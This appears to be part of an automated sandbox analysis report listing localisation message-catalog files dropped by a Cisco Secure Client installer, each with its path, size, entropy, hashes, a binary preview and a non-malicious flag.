                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\de-de\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):361321
                                                                                                                                      Entropy (8bit):5.209740954129793
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UK9dlRVBKfKh++1/nK0Gg4tIOIeJgzu7b:L7hD1/Eqi
                                                                                                                                      MD5:896374392BD925153CD66C80C719F912
                                                                                                                                      SHA1:E640B935A2400502607218A0ACA6CC281EFC26A5
                                                                                                                                      SHA-256:D8264819DB8F3D333ECAC920A8C7240878114F30610EAB49FD817005199A8D29
                                                                                                                                      SHA-512:3693C050D0E759439E1B03144F623AB735F268D44F97AC7E7726CAF10B5D43F7266EAD8BD8267F57B79AFEF35945BE8D9157F77C77AFCC367C77706600925EB5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\de-de\LC_MESSAGES\is-K0SJA.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):361321
                                                                                                                                      Entropy (8bit):5.209740954129793
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UK9dlRVBKfKh++1/nK0Gg4tIOIeJgzu7b:L7hD1/Eqi
                                                                                                                                      MD5:896374392BD925153CD66C80C719F912
                                                                                                                                      SHA1:E640B935A2400502607218A0ACA6CC281EFC26A5
                                                                                                                                      SHA-256:D8264819DB8F3D333ECAC920A8C7240878114F30610EAB49FD817005199A8D29
                                                                                                                                      SHA-512:3693C050D0E759439E1B03144F623AB735F268D44F97AC7E7726CAF10B5D43F7266EAD8BD8267F57B79AFEF35945BE8D9157F77C77AFCC367C77706600925EB5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\es-es\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):354736
                                                                                                                                      Entropy (8bit):5.123789642260049
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogM+Iy/aLiY2DBoVBKIuDVKuAYjG+chxEb1XVnhk0NrNQA/nUkSY:LjH3UKJZLiY2DyVBKfKh+w4i5ZY
                                                                                                                                      MD5:9D4300C87C9E378A13EFA9999D305929
                                                                                                                                      SHA1:0A7BB44A99208085296E782FD2E7B22170E7D03A
                                                                                                                                      SHA-256:D92D3E91F1B4036435CC6E39E2CE048DE7153A54577695313ACA1119DF70DE82
                                                                                                                                      SHA-512:297D7848FB011D8E79A7EE1B48D42227FC8582848B9232F4ED155B5FA1476C25654885FBD39E0207DD86F619BFC0FDE41A0D448365E5B1D57D7C359B7EAE3B1F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\es-es\LC_MESSAGES\is-UNTU0.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):354736
                                                                                                                                      Entropy (8bit):5.123789642260049
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogM+Iy/aLiY2DBoVBKIuDVKuAYjG+chxEb1XVnhk0NrNQA/nUkSY:LjH3UKJZLiY2DyVBKfKh+w4i5ZY
                                                                                                                                      MD5:9D4300C87C9E378A13EFA9999D305929
                                                                                                                                      SHA1:0A7BB44A99208085296E782FD2E7B22170E7D03A
                                                                                                                                      SHA-256:D92D3E91F1B4036435CC6E39E2CE048DE7153A54577695313ACA1119DF70DE82
                                                                                                                                      SHA-512:297D7848FB011D8E79A7EE1B48D42227FC8582848B9232F4ED155B5FA1476C25654885FBD39E0207DD86F619BFC0FDE41A0D448365E5B1D57D7C359B7EAE3B1F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\fr-ca\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):366110
                                                                                                                                      Entropy (8bit):5.203256685903476
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKZRI1w8uVBKfKh+EMVBfFUwKmXeEXNfl:L7hnRCgwKmXeEdfl
                                                                                                                                      MD5:283DE4CDF40608573B8CF8ACF853524A
                                                                                                                                      SHA1:43119C50A0F9459624D7CA1CCC9C65D0474EDC32
                                                                                                                                      SHA-256:6169558657F7D31BBA1335D14D8515877F0EBCF963604F54D7B8676F59437426
                                                                                                                                      SHA-512:63FAF192C420503F17700E9B757F864F997B76E3DC41BAA01F664672159FEFDC84F338BBA77B06E5D0DF29FA4A422CCA49FDDAC80F7F64C35570E9430972618F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\fr-ca\LC_MESSAGES\is-46KHK.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):366110
                                                                                                                                      Entropy (8bit):5.203256685903476
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKZRI1w8uVBKfKh+EMVBfFUwKmXeEXNfl:L7hnRCgwKmXeEdfl
                                                                                                                                      MD5:283DE4CDF40608573B8CF8ACF853524A
                                                                                                                                      SHA1:43119C50A0F9459624D7CA1CCC9C65D0474EDC32
                                                                                                                                      SHA-256:6169558657F7D31BBA1335D14D8515877F0EBCF963604F54D7B8676F59437426
                                                                                                                                      SHA-512:63FAF192C420503F17700E9B757F864F997B76E3DC41BAA01F664672159FEFDC84F338BBA77B06E5D0DF29FA4A422CCA49FDDAC80F7F64C35570E9430972618F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\fr-fr\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):362312
                                                                                                                                      Entropy (8bit):5.179123156153952
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKDGU3VBKfKh+GCaWCbQgoksGtxZMexJ8tjjNa+HTDzewKLMYspLW1UbwR+Q:L7hDGBRbBwR+Q
                                                                                                                                      MD5:0656A498B0ADF363A0D80BAF67A4C24B
                                                                                                                                      SHA1:A8D919E044EF0C20BDC2671F74EE38C3428C42D1
                                                                                                                                      SHA-256:F1BBF2D27C7CD80028E38E54097A975735F06035674BD991AAFF05429B479A30
                                                                                                                                      SHA-512:93D1603302BB59C25CB93B5012CAAB94A846092342CC947F508C46A7BE464F6C40B526E1F080E0536FF577DA74891EC51A3B3A65501547898AAABD71613FA84A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\fr-fr\LC_MESSAGES\is-0VTB2.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):362312
                                                                                                                                      Entropy (8bit):5.179123156153952
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKDGU3VBKfKh+GCaWCbQgoksGtxZMexJ8tjjNa+HTDzewKLMYspLW1UbwR+Q:L7hDGBRbBwR+Q
                                                                                                                                      MD5:0656A498B0ADF363A0D80BAF67A4C24B
                                                                                                                                      SHA1:A8D919E044EF0C20BDC2671F74EE38C3428C42D1
                                                                                                                                      SHA-256:F1BBF2D27C7CD80028E38E54097A975735F06035674BD991AAFF05429B479A30
                                                                                                                                      SHA-512:93D1603302BB59C25CB93B5012CAAB94A846092342CC947F508C46A7BE464F6C40B526E1F080E0536FF577DA74891EC51A3B3A65501547898AAABD71613FA84A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\hu-hu\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):362333
                                                                                                                                      Entropy (8bit):5.410491653751883
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKi/6g1JVBKfKh+KLOPdxLFCtnCCt+GawO+:L7hXgpOFxtn+
                                                                                                                                      MD5:E0D3819F0EB0197EF322DC22B375C578
                                                                                                                                      SHA1:F6E9928FA3CEF1B892703DE3EA394BF5D5A4DE52
                                                                                                                                      SHA-256:235C288B5B2A29BE8EA14140AA9D223314AD559545A39D4EEC7F5EB09C024DAD
                                                                                                                                      SHA-512:358574029EF1BCE7A9A20263155338EEA7A00BE9C2DA7215177A2674EB3655AF74BD11248F231F4A5EE2D0C27E0862ECD88B7B2BD6944328B91DD58BA71DE462
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\hu-hu\LC_MESSAGES\is-RC7UI.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):362333
                                                                                                                                      Entropy (8bit):5.410491653751883
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKi/6g1JVBKfKh+KLOPdxLFCtnCCt+GawO+:L7hXgpOFxtn+
                                                                                                                                      MD5:E0D3819F0EB0197EF322DC22B375C578
                                                                                                                                      SHA1:F6E9928FA3CEF1B892703DE3EA394BF5D5A4DE52
                                                                                                                                      SHA-256:235C288B5B2A29BE8EA14140AA9D223314AD559545A39D4EEC7F5EB09C024DAD
                                                                                                                                      SHA-512:358574029EF1BCE7A9A20263155338EEA7A00BE9C2DA7215177A2674EB3655AF74BD11248F231F4A5EE2D0C27E0862ECD88B7B2BD6944328B91DD58BA71DE462
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\it-it\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):348721
                                                                                                                                      Entropy (8bit):5.110965971564126
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKh3E5VBKfKh+YFxrglCbcTpLSmYYTpkDUcf8864POcncKpFsy0E5zQE+rAJ:L7hp2
                                                                                                                                      MD5:20C363D5CC6F504F8269CD61B388DCDE
                                                                                                                                      SHA1:1F8149525D4B96E42A6E3DCB75D1BEB891A0C9E0
                                                                                                                                      SHA-256:22DA7703EE811B0A7288F7BD771732B62D9284A156ED43A8E575A266134ADE9E
                                                                                                                                      SHA-512:4B8B2D03E7670E1635054591E929176781A33B6AAF9B02AF80AD19D02257EA827E9D7E5F5E4F698730AD27699FA5F7D90257EE8967C5886D2E94F18BFF621876
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\it-it\LC_MESSAGES\is-ABU5A.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):348721
                                                                                                                                      Entropy (8bit):5.110965971564126
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKh3E5VBKfKh+YFxrglCbcTpLSmYYTpkDUcf8864POcncKpFsy0E5zQE+rAJ:L7hp2
                                                                                                                                      MD5:20C363D5CC6F504F8269CD61B388DCDE
                                                                                                                                      SHA1:1F8149525D4B96E42A6E3DCB75D1BEB891A0C9E0
                                                                                                                                      SHA-256:22DA7703EE811B0A7288F7BD771732B62D9284A156ED43A8E575A266134ADE9E
                                                                                                                                      SHA-512:4B8B2D03E7670E1635054591E929176781A33B6AAF9B02AF80AD19D02257EA827E9D7E5F5E4F698730AD27699FA5F7D90257EE8967C5886D2E94F18BFF621876
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\ja-jp\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):388375
                                                                                                                                      Entropy (8bit):5.9662824242248815
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogMVyKDmDma70moVBKIuDVKuAYjG+chxEb1XVnhpHg7rmYO0pK4Wl1:LjH3UKtpKDKVBKfKh+HYOSWb
                                                                                                                                      MD5:0C1C5B23F0C946634836320A60E2246B
                                                                                                                                      SHA1:9C19265229FAD61B2FCB9FA8E2DC2FDD5DFD97E0
                                                                                                                                      SHA-256:83A4965A098972336EEFD6C9F9D070BA4C546B11494423621155A2E8084B864E
                                                                                                                                      SHA-512:E08008AFDFEECA4D75ED57AB9DBAA002F1CA30C0F8B32507EABDE3367AA5152ACEF4F60230E01966F3EC38315BBCD77384F874EC69F8327AEB4720182CB10BF0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\ja-jp\LC_MESSAGES\is-71R18.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):388375
                                                                                                                                      Entropy (8bit):5.9662824242248815
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogMVyKDmDma70moVBKIuDVKuAYjG+chxEb1XVnhpHg7rmYO0pK4Wl1:LjH3UKtpKDKVBKfKh+HYOSWb
                                                                                                                                      MD5:0C1C5B23F0C946634836320A60E2246B
                                                                                                                                      SHA1:9C19265229FAD61B2FCB9FA8E2DC2FDD5DFD97E0
                                                                                                                                      SHA-256:83A4965A098972336EEFD6C9F9D070BA4C546B11494423621155A2E8084B864E
                                                                                                                                      SHA-512:E08008AFDFEECA4D75ED57AB9DBAA002F1CA30C0F8B32507EABDE3367AA5152ACEF4F60230E01966F3EC38315BBCD77384F874EC69F8327AEB4720182CB10BF0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\ko-kr\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):357929
                                                                                                                                      Entropy (8bit):6.014691052026819
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogM5PcD4sAVoVBKIuDVKuAYjG+chxEb1XVnhkv3zdYGLzOJ7CiqP0aCKo:LjH3UKwSOVBKfKh+wfBY6iJ7CLc5Ko
                                                                                                                                      MD5:B0DAAEF17D63E6DB7225FC65A5BEED25
                                                                                                                                      SHA1:CD73B824DDC96B0BCB4BA3E4BF389BF8153B2440
                                                                                                                                      SHA-256:3B0D7490F9015F37EBA158AFE26F9C56A9D35624564CD295EC596D9A6B52B340
                                                                                                                                      SHA-512:448D36E38E516A33CD5A9AB50B3DEE45B1EED40E05AC9B13B3041CC4523EB8E42EE3A88355FA27A1652D0B8D9C58DECD90FF88EEE2765D42584FD94142ACDA8B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\l10n\ko-kr\LC_MESSAGES\is-R6OG5.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):357929
                                                                                                                                      Entropy (8bit):6.014691052026819
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogM5PcD4sAVoVBKIuDVKuAYjG+chxEb1XVnhkv3zdYGLzOJ7CiqP0aCKo:LjH3UKwSOVBKfKh+wfBY6iJ7CLc5Ko
                                                                                                                                      MD5:B0DAAEF17D63E6DB7225FC65A5BEED25
                                                                                                                                      SHA1:CD73B824DDC96B0BCB4BA3E4BF389BF8153B2440
                                                                                                                                      SHA-256:3B0D7490F9015F37EBA158AFE26F9C56A9D35624564CD295EC596D9A6B52B340
                                                                                                                                      SHA-512:448D36E38E516A33CD5A9AB50B3DEE45B1EED40E05AC9B13B3041CC4523EB8E42EE3A88355FA27A1652D0B8D9C58DECD90FF88EEE2765D42584FD94142ACDA8B
                                                                                                                                      Malicious:false
